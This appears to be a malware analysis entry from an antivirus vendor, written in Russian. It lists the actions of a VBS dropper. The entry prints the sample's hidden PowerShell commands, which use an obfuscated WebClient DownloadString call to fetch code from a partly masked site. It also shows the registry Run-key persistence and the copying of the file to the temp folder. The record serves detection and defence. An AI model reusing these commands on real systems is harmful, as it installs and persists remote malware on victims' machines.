Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%TEMP%\<Имя файла>.vbs'
- %TEMP%\<Имя файла>.vbs
- DNS ASK si##z.site
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit $vbs = New-Object -ComObject 'MSScriptControl.ScriptControl';$vbs.Language = 'VBScript';$text='(&(GCM *W-O*)Ne'+'t.We'+'bCl'+'ient).Dow'+'nloa'+'dSt'+'ring(''http://si##z.site/lib/q.jp...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%TEMP%\<Имя файла>.vbs'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "<LS_APPDATA>\Temp" /Y' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit $vbs = New-Object -ComObject 'MSScriptControl.ScriptControl';$vbs.Language = 'VBScript';$text='(&(GCM *W-O*)Ne'+'t.We'+'bCl'+'ient).Dow'+'nloa'+'dSt'+'ring(''http://si##z.site/lib/q.jp...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%TEMP%\<Имя файла>.vbs'
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "<LS_APPDATA>\Temp" /Y